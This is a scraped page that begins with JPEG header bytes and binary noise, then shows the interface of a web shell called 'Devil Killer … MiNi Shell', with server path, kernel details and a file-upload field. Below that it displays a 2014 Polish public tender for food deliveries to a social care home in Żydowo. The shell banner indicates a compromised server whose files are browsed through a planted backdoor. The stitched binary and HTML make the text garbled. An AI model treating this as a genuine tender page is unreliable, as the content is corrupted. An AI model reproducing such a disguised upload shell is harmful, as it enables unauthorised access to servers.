JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/345810-N-2014.html

<p class="kh_header"><b>Żydowo: SUKCESYWNE DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH
NA POTRZEBY DOMU POMOCY SPOŁECZNEJ W ŻYDOWIE</b><br>
<b>Numer ogłoszenia: 345810 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Żydowie , Żydowo 112, 76-012 Żydowo, woj. zachodniopomorskie, tel. 094 3188879, -87, - 89, faks 094 3188879.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> dps.zydowo.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH
NA POTRZEBY DOMU POMOCY SPOŁECZNEJ W ŻYDOWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych na potrzeby Domu  Pomocy Społecznej w Żydowie CPV 03000000-1 Produkty rolnictwa, hodowli, rybołówstwa, leśnictwa i podobne CPV  15000000-8 Żywność, napoje  z podziałem na części Część Nr 1- Sukcesywna dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin.Część Nr 2 - Sukcesywna dostawa   mięsa drobiowego produktów mięsnych  i wędlin.  Część nr 3 - Sukcesywne dostawy produktów ogólno-spożywczych.Część nr 4 - Sukcesywne dostawy pieczywa, świeżych wyrobów piekarskich i  ciastkarskich.Cześć nr 5 - Sukcesywne dostawy mleka, produktów mleczarskich i tłuszczy.Część nr 6 - Sukcesywne dostawy świeżych warzyw, owoców i ziemniaków.Część nr 7 - Sukcesywne dostawy ryb przetworzonych i konserwowanych.	Część nr 8   -Sukcesywne dostawy jaj konsumpcyjnych.  2.Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia z podziałem na osiem części.3.Dostawa przedmiotu zamówienia następować będzie loco magazyn żywnościowy Domu Pomocy Społecznej w Żydowie transportem Wykonawcy na jego koszt i ryzyko.4.	Artykuły będące przedmiotem zamówienia będą wytworzone i dostarczane zgodnie z ustawą o bezpieczeństwie żywności i żywienia z dnia 25.08.2006r. tj. Dz. U. 2010 Nr 136, poz. 914 z późn. zm. oraz aktualnych rozporządzeń wydanych na jej podstawie.5.Wykonawca gwarantuje wysoką jakość artykułów zgodną z normami oraz zobowiązuje się do udzielenia gwarancji jakościowej na dostarczane artykuły min. ? okresu określonego przez producenta, gwarancja rozpoczyna swój bieg od dnia odbioru przez Zamawiającego. Gwarancja rozpoczyna swój bieg od daty odbioru każdej partii towaru.6.	Dostawy częściowe, o których mowa w pkt 1 następować będą w terminie nie dłuższym niż 2 dni robocze od daty otrzymania zamówienia, chyba że Zamawiający ustali dłuższy termin.7.Zamówienie składane  na dostawę  przesłane będzie faxem lub telefoniczne.8.Zamawiane artykuły powinny być dostarczane w opakowaniach -skrzynki, pojemniki itp. Opakowanie powinno być dostosowane do właściwości danego artykułu i odpowiednie z punktu widzenia higieny i bezpieczeństwa zdrowotnego żywności, zgodnie z obowiązującymi przepisami. Środki transportu powinny być czyste i bez obcych zapachów.
9.Wykonawca zapewnia dostawy przedmiotu zamówienia  przez cały okres trwania umowy.10.Zamawiający zastrzega sobie prawo do niewykorzystania  pełnego limitu ilościowego   przedmiotu zamówienia   bez prawa roszczeń z tego  tytułu przez Wykonawcę ,a w szczególności z tytułu niezrealizowania umowy do pełnej wartości. Przysługuje  mu tylko   zapłata za faktycznie dostarczoną ilość.11.Zamawiający zastrzega sobie prawo zmian ilościowych asortymentu danej części określonego w  załączniku nr 1 do niniejszej siwz w granicach ogólnej wartości danej części zamówienia. Zmiany te nie stanowią zmiany umowy. 12.W związku z obowiązującym w Domu Pomocy Społecznej systemem HACCP należy przedstawić  w momencie rozpoczęcia dostaw i na żądanie SANEPID-u   n.w. dokumenty a)Decyzja Państwowego Powiatowego Inspektoratu Sanitarnego dla środka transportu zezwalająca na przewóz produktów spożywczych.b)	Aktualne orzeczenie lekarskie z badania do celów sanitarno-epidemiologicznych osoby dostarczającej towar.
16.Umożliwienie kontroli środka transportu i pojemników -opakowań. do przewozu towaru pod   kątem czystości.17.Do każdej dostawy Wykonawca dołącza:handlowy dokument identyfikacyjny,WZ lub Fakturę
18.Odbioru jakościowego artykułów  dokonuje Zamawiający w chwili ich dostawy.19.Jako termin realizacji dostawy rozumie się datę złożenia podpisu na dokumencie odbioru dostawy  przez   osobę  upoważnioną do odbioru ze strony Zamawiającego.20.W przypadku dostarczenia artykułów z wadami lub brakami Wykonawca dokona wymiany lub ich   uzupełnienia na artykuły wolne od wad na swój koszt w terminie 24 godzin od dostawy artykułów.21.W razie wykrycia w terminie późniejszym wad w przedmiocie dostawy Zamawiający zobowiązany jest    niezwłocznie złożyć Wykonawcy reklamację ustnie lub faksem do dokumentu odbioru.22.Załatwienie reklamacji winno nastąpić niezwłocznie w trybie indywidualnych uzgodnień i w sposób   właściwy dla danego towaru, nie później niż w ciągu 2 dni od zgłoszenia. 
23.W przypadku niedostarczenia przez Wykonawcę artykułów wcześniej zamówionych, o niższej niż   deklarowana jakości lub w jakikolwiek inny sposób niezgodnej z przedmiotem zamówienia, Zamawiającemu przysługuje prawo do zakupu interwencyjnego odpowiedniej ilości artykułów, będących     przedmiotem dostawy, na wolnym rynku od innego dostawcy w ilości i asortymencie nie zrealizowanej  dostawy.24.W przypadku zakupu interwencyjnego Wykonawca zobowiązany jest do zwrotu Zamawiającemu różnicy pomiędzy ceną zakupu interwencyjnego, a  ceną dostawy ustaloną w zawartej z Wykonawcą umowie.25.Płatność będzie realizowana sukcesywnie po każdej dostawie przedmiotu zamówienia do Zamawiającego,  na podstawie faktur  wystawianych   na płatnika:  Dom Pomocy Społecznej ,76-012 Żydowo 107,26.Należność płatna przelewem na rachunek Wykonawcy  w terminie 30 dni licząc od daty  doręczenia faktury do Zamawiającego na adres: Dom Pomocy Społecznej ,76-012 Żydowo 107,
27.W szczególnych przypadkach wynikających z okoliczności, których nie można było przewidzieć, na   etapie prowadzonego postępowania o udzielenie zamówienia publicznego np. zaprzestanie produkcji,  zmiana nazwy asortymentu, dopuszcza się możliwość zastąpienia go towarem o  nie gorszych 
parametrach i w tej samej cenie.28.Wykonawca realizujący przedmiot zamówienia  z wykorzystaniem podwykonawców zobowiązany jest do wskazania w swojej ofercie części zamówienia-zakresu,których wykonanie zamierza powierzyć podwykonawcom. Wykonawca ponosi odpowiedzialność za jakość realizacji przedmiotu zamówienia przez podwykonawców oraz zobowiązany jest do zapłaty wynagrodzenia na ich rzecz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.14.25.00-3, 03.20.00.00-3, 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.11.30.00-3, 15.11.40.00-0, 15.13.11.30-5, 15.13.11.34-3, 15.13.14.10-2, 15.11.20.00-6, 15.11.21.30-6, 15.13.11.35-0, 15.20.00.00-0, 15.33.00.00-0, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi wykazać, że  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie realizacje minimum  jednego zamówienia na sukcesywną dostawę artykułów spożywczych o wartości dostawy nie mniejszej niż :
Część Nr 1-60.000 zł(sześćdziesiąt tysięcy złotych)
Część Nr 2-20.000 zł(dwadzieścia tysięcy złotych)
Część Nr 3-35.000 zł(trzydzieści pięć tysięcy złotych)
Część Nr 4-25.000 zł(dwadzieścia  pięć tysięcy złotych)
Część Nr 5-60.000 zł(sześćdziesiąt tysięcy złotych)
Część Nr 6-35.000 zł(trzydzieści pięć tysięcy złotych)
Część Nr 7-10.000 zł(dziesięć tysięcy złotych)
Część Nr 8-10.000 zł(dziesięć tysięcy złotych)
Na potwierdzenie spełniania postawionego warunku
Wykonawca musi złożyć wykaz na-wg załącznika nr 6
do SIWZ wraz z wymaganymi załącznikami.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	SZCZEGÓŁOWE ZESTAWIENIE ILOŚCIOWE PRZEDMIOTU ZAMÓWIENIA  Część Nr..............                                                                                   wypełnione na/wg Załącznika nr 1 do SIWZ.2)WYPEŁNIONY FORMULARZ OFERTOWY sporządzona na/wg   Załącznika nr 2 do SIWZ,3)	INFORMACJA WYKONAWCY o tym, że nie należy do grupy kapitałowej                                                                                               sporządzona  na/wg     Załącznika nr 7 do SIWZ.

4)	LISTA PODMIOTÓW należących do tej samej grupy kapitałowej 
                                                                                           sporządzona na/wg     Załącznika  nr 8  do SIWZ.

5)OŚWIADCZENIE WYKONAWCY, że posiada atesty na dostarczane    
produkty(HACCP lub Handlowy Dokument  Identyfikacyjny),a także oświadczenie, iż na każde żądanie Zamawiającego   przedstawi dokumenty    potwierdzające to oświadczenie 
                                                                                         sporządzone na/wg Załącznika nr 10 do SIWZ
6)Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć   PEŁNOMOCNICTWO(A) do działania w imieniu Wykonawcy (podpisanie oferty, reprezentowanie Wykonawcy, ewentualnie inne działania np. podpisanie umowy) - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu Wykonawcy nie wynikają z innych złożonych dokumentów.
7)ZOBOWIĄZANIE sporządzone na/wg Załącznika nr 9 do SIWZ wypełniają tylko te podmioty, które udostępniają Wykonawcy swoje zasoby.
DOKUMENTY PODMIOTÓW ZAGRANICZNYCH:
W świetle postawionych w niniejszym postępowaniu warunków udziału w postępowaniu, Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składają tak jak Wykonawcy polscy oświadczenia i dokumenty wymienione w pkt XI  pdpkt 1,2,3.SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w przypadku:1)wystąpienia siły wyższej,2)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
3)każdej zmiany, która jest korzystna lub neutralna dla Zamawiającego ,lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dps.zydowo.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Materiały przetargowe  w formie papierowej można uzyskać w siedzibie Domu Pomocy Społecznej w Żydowie 107, pok.3, w dni robocze w godz. od 9.00 - 14.00,tel.(094)  318-88-87 wew.34..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2014 godzina 11:00, miejsce: DOM POMOCY SPOŁECZNEJ W ŻYDOWIE  76 - 012 Żydowo 107
pow. Koszalin   pokój nr 5 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy    mięsa  wieprzowego, produktów mięsnych i wędlin na potrzeby Domu  Pomocy Społecznej w Żydowie.2)	Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.11.30.00-3, 15.11.40.00-0, 15.13.00.00-8, 15.13.10.00-5, 15.13.11.34-3, 15.13.13.10-1, 15.13.14.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa   mięsa drobiowego produktów mięsnych  i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy mięsa drobiowego produktów mięsnych  i wędlin na potrzeby Domu Pomocy Społecznej w Żydowie
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.11.20.00-6, 15.13.11.35-0, 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy produktów ogólno-spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy produktów ogólno-spożywczych na potrzeby Domu   Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.00.00-0, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.98.14.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> sukcesywne dostawy pieczywa, świeżych wyrobów piekarskich i  ciastkarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy pieczywa, świeżych wyrobów piekarskich i  ciastkarskich  na potrzeby Domu   Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywne dostawy mleka, produktów mleczarskich i tłuszczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy mleka, produktów mleczarskich i tłuszczy na potrzeby Domu   Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sukcesywne dostawy świeżych warzyw, owoców i ziemniaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy świeżych warzyw, owoców i ziemniaków na potrzeby Domu   Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sukcesywne dostawy ryb przetworzonych i konserwowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy ryb przetworzonych i konserwowanych na potrzeby Domu   Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 7.</p></li>
